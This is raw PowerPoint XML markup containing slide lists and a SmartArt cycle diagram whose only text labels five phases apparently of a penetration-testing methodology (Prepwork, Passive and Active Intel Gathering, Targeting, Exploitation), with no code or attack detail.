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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="340" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="341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270" r:id="rId16"/>
    <p:sldId id="405" r:id="rId17"/>
    <p:sldId id="349" r:id="rId18"/>
    <p:sldId id="401" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="379" r:id="rId21"/>
    <p:sldId id="343" r:id="rId22"/>
    <p:sldId id="347" r:id="rId23"/>
    <p:sldId id="348" r:id="rId24"/>
    <p:sldId id="403" r:id="rId25"/>
    <p:sldId id="344" r:id="rId26"/>
    <p:sldId id="382" r:id="rId27"/>
    <p:sldId id="346" r:id="rId28"/>
    <p:sldId id="338" r:id="rId29"/>
    <p:sldId id="402" r:id="rId30"/>
    <p:sldId id="350" r:id="rId31"/>
    <p:sldId id="383" r:id="rId32"/>
    <p:sldId id="262" r:id="rId33"/>
    <p:sldId id="352" r:id="rId34"/>
    <p:sldId id="360" r:id="rId35"/>
    <p:sldId id="397" r:id="rId36"/>
    <p:sldId id="381" r:id="rId37"/>
    <p:sldId id="404" r:id="rId38"/>
    <p:sldId id="380" r:id="rId39"/>
    <p:sldId id="353" r:id="rId40"/>
    <p:sldId id="391" r:id="rId41"/>
    <p:sldId id="392" r:id="rId42"/>
    <p:sldId id="394" r:id="rId43"/>
    <p:sldId id="396" r:id="rId44"/>
    <p:sldId id="390" r:id="rId45"/>
    <p:sldId id="367" r:id="rId46"/>
    <p:sldId id="384" r:id="rId47"/>
    <p:sldId id="385" r:id="rId48"/>
    <p:sldId id="398" r:id="rId49"/>
    <p:sldId id="355" r:id="rId50"/>
    <p:sldId id="368" r:id="rId51"/>
    <p:sldId id="356" r:id="rId52"/>
    <p:sldId id="369" r:id="rId53"/>
    <p:sldId id="357" r:id="rId54"/>
    <p:sldId id="370" r:id="rId55"/>
    <p:sldId id="386" r:id="rId56"/>
    <p:sldId id="400" r:id="rId57"/>
    <p:sldId id="399" r:id="rId58"/>
    <p:sldId id="387" r:id="rId59"/>
    <p:sldId id="388" r:id="rId60"/>
    <p:sldId id="358" r:id="rId61"/>
    <p:sldId id="359" r:id="rId62"/>
    <p:sldId id="363" r:id="rId63"/>
    <p:sldId id="364" r:id="rId64"/>
    <p:sldId id="365" r:id="rId65"/>
    <p:sldId id="366" r:id="rId66"/>
    <p:sldId id="362" r:id="rId67"/>
    <p:sldId id="342" r:id="rId68"/>
    <p:sldId id="328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68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18" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="-14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9CD13E-61D8-44A5-828F-3866FD41805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E32C8-6BB7-4568-BF1F-4AC17B7BAB07}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Passive Intel Gathering</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1267B5A6-4787-4C2F-BF4C-34D1C5812D27}" type="parTrans" cxnId="{D92BADC6-3F0B-45D8-8E5E-01385D971390}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62439496-94B5-4797-A336-5D5853F65294}" type="sibTrans" cxnId="{D92BADC6-3F0B-45D8-8E5E-01385D971390}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD87B151-82A3-4A46-B8CC-B43E71609F3A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Active Intel Gathering</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53D95D7E-13DC-4180-9EAB-6A00A38ABFA2}" type="parTrans" cxnId="{FEF656E4-D921-4116-89F7-8CF39BF2773C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{724B1587-2A01-4F11-B6D3-DE2BD77ABA4B}" type="sibTrans" cxnId="{FEF656E4-D921-4116-89F7-8CF39BF2773C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63B086F0-6051-4647-AAE7-6FD5C2C27EF5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Targeting</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B5FCA4-DF07-4FD0-B0F0-FA2E60C33B27}" type="parTrans" cxnId="{A99D93DC-195A-4224-92DD-44585A3BDCAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B3FF478-6109-4D5E-83D8-F065E6772003}" type="sibTrans" cxnId="{A99D93DC-195A-4224-92DD-44585A3BDCAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1F8EDFD-9B2A-4A47-BC0C-10C63D4A5E7A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1CD1EB8-B428-4769-9594-4CC6059ED432}" type="parTrans" cxnId="{1FDDA70A-33E9-4155-8DCA-ABD1EC564DFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DE0E70A-C1BD-42D1-9AFB-3A30C7BC58F6}" type="sibTrans" cxnId="{1FDDA70A-33E9-4155-8DCA-ABD1EC564DFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80E645D4-6FEB-4104-9126-E730C78BDC68}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>Prepwork</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA023613-E701-441F-A9C4-F09DDF5B080A}" type="parTrans" cxnId="{C66B903F-2C8B-4109-AF27-3F3B475BCAD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{064595BA-CF45-42DE-BD86-EBE8BC7445D3}" type="sibTrans" cxnId="{C66B903F-2C8B-4109-AF27-3F3B475BCAD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" type="pres">
      <dgm:prSet presAssocID="{879CD13E-61D8-44A5-828F-3866FD41805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30B805-6D1C-4266-ABD1-05815826935B}" type="pres">
      <dgm:prSet presAssocID="{80E645D4-6FEB-4104-9126-E730C78BDC6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5796B-AA35-44D1-8124-695AD182E7BB}" type="pres">
      <dgm:prSet presAssocID="{80E645D4-6FEB-4104-9126-E730C78BDC68}" presName="spNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D3084C5-CF08-4513-9FB3-2FD0A5609CEC}" type="pres">
      <dgm:prSet presAssocID="{064595BA-CF45-42DE-BD86-EBE8BC7445D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74611FEF-B161-4903-AE42-9E475CFAB8B1}" type="pres">
      <dgm:prSet presAssocID="{A04E32C8-6BB7-4568-BF1F-4AC17B7BAB0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C5693-A538-43CB-A8C7-C85A80B5DFAA}" type="pres">
      <dgm:prSet presAssocID="{A04E32C8-6BB7-4568-BF1F-4AC17B7BAB07}" presName="spNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7F4F7EC-013A-432B-B517-7888E0A2955C}" type="pres">
      <dgm:prSet presAssocID="{62439496-94B5-4797-A336-5D5853F65294}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AF8C701-67F2-46DF-BC2A-59D8372E9315}" type="pres">
      <dgm:prSet presAssocID="{BD87B151-82A3-4A46-B8CC-B43E71609F3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5F0CC-3949-4D43-BA72-BEDFDD6ACFBF}" type="pres">
      <dgm:prSet presAssocID="{BD87B151-82A3-4A46-B8CC-B43E71609F3A}" presName="spNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AAF1C10-0724-43BB-BF4F-A35871CAFCBA}" type="pres">
      <dgm:prSet presAssocID="{724B1587-2A01-4F11-B6D3-DE2BD77ABA4B}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FAFD58C-AB75-40EE-9FCB-580348A9EE69}" type="pres">
      <dgm:prSet presAssocID="{63B086F0-6051-4647-AAE7-6FD5C2C27EF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79BAA-1E42-4B09-90E4-F6729E237570}" type="pres">
      <dgm:prSet presAssocID="{63B086F0-6051-4647-AAE7-6FD5C2C27EF5}" presName="spNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B4C6C5F-80CF-47BF-A242-59CB8101E428}" type="pres">
      <dgm:prSet presAssocID="{2B3FF478-6109-4D5E-83D8-F065E6772003}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6F80FA1-99A8-416D-A211-C2469C9521AF}" type="pres">
      <dgm:prSet presAssocID="{C1F8EDFD-9B2A-4A47-BC0C-10C63D4A5E7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74F5D-30E4-40EA-8688-1C35C0C316A1}" type="pres">
      <dgm:prSet presAssocID="{C1F8EDFD-9B2A-4A47-BC0C-10C63D4A5E7A}" presName="spNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C757A5B6-57C5-4B71-A21A-860575A0B3E1}" type="pres">
      <dgm:prSet presAssocID="{9DE0E70A-C1BD-42D1-9AFB-3A30C7BC58F6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6FB2D780-FDAB-45B9-AA21-E182C6740B1A}" type="presOf" srcId="{724B1587-2A01-4F11-B6D3-DE2BD77ABA4B}" destId="{0AAF1C10-0724-43BB-BF4F-A35871CAFCBA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{1FDDA70A-33E9-4155-8DCA-ABD1EC564DFE}" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{C1F8EDFD-9B2A-4A47-BC0C-10C63D4A5E7A}" srcOrd="4" destOrd="0" parTransId="{D1CD1EB8-B428-4769-9594-4CC6059ED432}" sibTransId="{9DE0E70A-C1BD-42D1-9AFB-3A30C7BC58F6}"/>
    <dgm:cxn modelId="{A99D93DC-195A-4224-92DD-44585A3BDCAC}" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{63B086F0-6051-4647-AAE7-6FD5C2C27EF5}" srcOrd="3" destOrd="0" parTransId="{35B5FCA4-DF07-4FD0-B0F0-FA2E60C33B27}" sibTransId="{2B3FF478-6109-4D5E-83D8-F065E6772003}"/>
    <dgm:cxn modelId="{04926C84-8F12-41A9-BDBD-D0CC9FA9E76E}" type="presOf" srcId="{62439496-94B5-4797-A336-5D5853F65294}" destId="{F7F4F7EC-013A-432B-B517-7888E0A2955C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{7BD85E90-45CA-4735-A1EE-FAA2BFB2E4EB}" type="presOf" srcId="{C1F8EDFD-9B2A-4A47-BC0C-10C63D4A5E7A}" destId="{F6F80FA1-99A8-416D-A211-C2469C9521AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{0F423E62-BCDA-4BBA-B79B-71C22AA8BB77}" type="presOf" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{B0AC479F-67B5-470E-985E-0F3C69C1318A}" type="presOf" srcId="{80E645D4-6FEB-4104-9126-E730C78BDC68}" destId="{7230B805-6D1C-4266-ABD1-05815826935B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{A73FADDD-65D5-48AD-ABBF-0F5A6B223020}" type="presOf" srcId="{63B086F0-6051-4647-AAE7-6FD5C2C27EF5}" destId="{5FAFD58C-AB75-40EE-9FCB-580348A9EE69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{9F7BF91B-CACC-4189-991E-14A179B0A680}" type="presOf" srcId="{2B3FF478-6109-4D5E-83D8-F065E6772003}" destId="{3B4C6C5F-80CF-47BF-A242-59CB8101E428}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{B462AD7C-51C0-44D0-987F-7F90AC2C594A}" type="presOf" srcId="{BD87B151-82A3-4A46-B8CC-B43E71609F3A}" destId="{4AF8C701-67F2-46DF-BC2A-59D8372E9315}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{C566DC34-E806-40E6-A594-94BA829B88C3}" type="presOf" srcId="{064595BA-CF45-42DE-BD86-EBE8BC7445D3}" destId="{9D3084C5-CF08-4513-9FB3-2FD0A5609CEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{D92BADC6-3F0B-45D8-8E5E-01385D971390}" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{A04E32C8-6BB7-4568-BF1F-4AC17B7BAB07}" srcOrd="1" destOrd="0" parTransId="{1267B5A6-4787-4C2F-BF4C-34D1C5812D27}" sibTransId="{62439496-94B5-4797-A336-5D5853F65294}"/>
    <dgm:cxn modelId="{FEF656E4-D921-4116-89F7-8CF39BF2773C}" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{BD87B151-82A3-4A46-B8CC-B43E71609F3A}" srcOrd="2" destOrd="0" parTransId="{53D95D7E-13DC-4180-9EAB-6A00A38ABFA2}" sibTransId="{724B1587-2A01-4F11-B6D3-DE2BD77ABA4B}"/>
    <dgm:cxn modelId="{CDE1DC85-99C0-4D59-80CD-D34E3168F2E6}" type="presOf" srcId="{9DE0E70A-C1BD-42D1-9AFB-3A30C7BC58F6}" destId="{C757A5B6-57C5-4B71-A21A-860575A0B3E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{347C85B9-72DE-42AA-873D-AA2807086244}" type="presOf" srcId="{A04E32C8-6BB7-4568-BF1F-4AC17B7BAB07}" destId="{74611FEF-B161-4903-AE42-9E475CFAB8B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{C66B903F-2C8B-4109-AF27-3F3B475BCAD5}" srcId="{879CD13E-61D8-44A5-828F-3866FD41805B}" destId="{80E645D4-6FEB-4104-9126-E730C78BDC68}" srcOrd="0" destOrd="0" parTransId="{AA023613-E701-441F-A9C4-F09DDF5B080A}" sibTransId="{064595BA-CF45-42DE-BD86-EBE8BC7445D3}"/>
    <dgm:cxn modelId="{173E89E5-592A-4B68-8913-7995225A14C9}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{7230B805-6D1C-4266-ABD1-05815826935B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{58ADACB9-737E-4EFD-8F37-13738884E1D9}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{1705796B-AA35-44D1-8124-695AD182E7BB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{32C219FD-464F-4D58-91A4-8C90E38B6328}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{9D3084C5-CF08-4513-9FB3-2FD0A5609CEC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{06227B73-E113-462B-9F07-220C111897E9}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{74611FEF-B161-4903-AE42-9E475CFAB8B1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{E6E12518-80D7-44CF-AFA7-D90D4FB44BAC}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{E68C5693-A538-43CB-A8C7-C85A80B5DFAA}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{CF6C4C48-C676-42A5-A332-11005BD602FD}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{F7F4F7EC-013A-432B-B517-7888E0A2955C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{1F53D3F2-660C-4423-97EA-75CAC5108794}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{4AF8C701-67F2-46DF-BC2A-59D8372E9315}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{09A7DEB5-5C71-49C0-B344-D4CEC9F966A6}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{0065F0CC-3949-4D43-BA72-BEDFDD6ACFBF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{504E3FB2-A9CC-435B-81EB-1518759800C8}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{0AAF1C10-0724-43BB-BF4F-A35871CAFCBA}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{DD70309D-B98C-49E5-8C95-EB5E28E70C1C}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{5FAFD58C-AB75-40EE-9FCB-580348A9EE69}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{BE4B1A67-ADB3-4D63-8FAB-B73E32E7E84A}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{1B279BAA-1E42-4B09-90E4-F6729E237570}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{57803E9F-5472-4088-BF91-7E215FC5E23A}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{3B4C6C5F-80CF-47BF-A242-59CB8101E428}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{68E9AE93-B0FA-42F8-AC94-DBD73D673A0E}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{F6F80FA1-99A8-416D-A211-C2469C9521AF}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{A4F83B7A-684B-4EC2-8573-C4154FC6DFC5}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{3B174F5D-30E4-40EA-8688-1C35C0C316A1}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle5"/>
    <dgm:cxn modelId="{C5F997B2-F066-494A-A655-C4A1BED4B884}" type="presParOf" srcId="{E0F50796-93B6-4ED3-ADD3-43D267DA3211}" destId="{C757A5B6-57C5-4B71-A21A-860575A0B3E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30B805-6D1C-4266-ABD1-05815826935B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3543448" y="561"/>
          <a:ext cx="1752302" cy="11389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Prepwork</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3543448" y="561"/>
        <a:ext cx="1752302" cy="1138996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9D3084C5-CF08-4513-9FB3-2FD0A5609CEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143048" y="570059"/>
          <a:ext cx="4553102" cy="4553102"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3387685" y="289577"/>
              </a:moveTo>
              <a:arcTo wR="2276551" hR="2276551" stAng="17952860" swAng="12124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11FEF-B161-4903-AE42-9E475CFAB8B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5708577" y="1573619"/>
          <a:ext cx="1752302" cy="11389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Passive Intel Gathering</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5708577" y="1573619"/>
        <a:ext cx="1752302" cy="1138996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F7F4F7EC-013A-432B-B517-7888E0A2955C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143048" y="570059"/>
          <a:ext cx="4553102" cy="4553102"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4547655" y="2433942"/>
              </a:moveTo>
              <a:arcTo wR="2276551" hR="2276551" stAng="21837862" swAng="13604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8C701-67F2-46DF-BC2A-59D8372E9315}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4881572" y="4118881"/>
          <a:ext cx="1752302" cy="11389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Active Intel Gathering</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4881572" y="4118881"/>
        <a:ext cx="1752302" cy="1138996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0AAF1C10-0724-43BB-BF4F-A35871CAFCBA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143048" y="570059"/>
          <a:ext cx="4553102" cy="4553102"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2556256" y="4535854"/>
              </a:moveTo>
              <a:arcTo wR="2276551" hR="2276551" stAng="4976556" swAng="8468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FD58C-AB75-40EE-9FCB-580348A9EE69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2205325" y="4118881"/>
          <a:ext cx="1752302" cy="11389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Targeting</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2205325" y="4118881"/>
        <a:ext cx="1752302" cy="1138996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3B4C6C5F-80CF-47BF-A242-59CB8101E428}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143048" y="570059"/>
          <a:ext cx="4553102" cy="4553102"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="241644" y="3297256"/>
              </a:moveTo>
              <a:arcTo wR="2276551" hR="2276551" stAng="9201706" swAng="13604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80FA1-99A8-416D-A211-C2469C9521AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1378319" y="1573619"/>
          <a:ext cx="1752302" cy="11389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Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1378319" y="1573619"/>
        <a:ext cx="1752302" cy="1138996"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C757A5B6-57C5-4B71-A21A-860575A0B3E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143048" y="570059"/>
          <a:ext cx="4553102" cy="4553102"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
